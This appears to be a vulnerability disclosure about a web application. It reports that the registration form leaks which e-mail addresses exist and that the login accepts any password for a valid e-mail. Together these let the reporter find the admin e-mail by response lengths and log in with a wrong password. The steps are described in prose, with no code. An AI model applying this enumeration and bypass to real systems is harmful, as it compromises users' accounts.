Mass User Enumeration to Authentication Bypass #36
Description
In the user registration field, when trying to register with an e-mail that exists in the system, the system indicates that this e-mail is registered in the system. This leads to a user enumeration vulnerability by using e-mail instead of username when logging in.
In addition, the incorrect password verification in the user login field allowed users to log in to any account they wanted “by entering only the correct e-mail address” and with an arbitrary password.
In the scenario where the two vulnerabilities mentioned above are combined, all user accounts in the system can be compromised. This is clearly demonstrated in the following scenario.
Let's take the registration HTTP request. We will perform enumeration over the e-mail address section.
As an example, I am adding 5 mails already in the system and 2 new mails to my list.
When I carry out the attack, I see accounts being created that are in 471 length.
The accounts with 444 answers are already in the system and I understand from the answer that they already exist in the system. Here I also found the admin email.
I log in using the admin email with a random wrong password (wrongpass).
I have successfully accessed the admin account.
References:
https://owasp.org/www-project-top-ten/2017/A2_2017-Broken_Authentication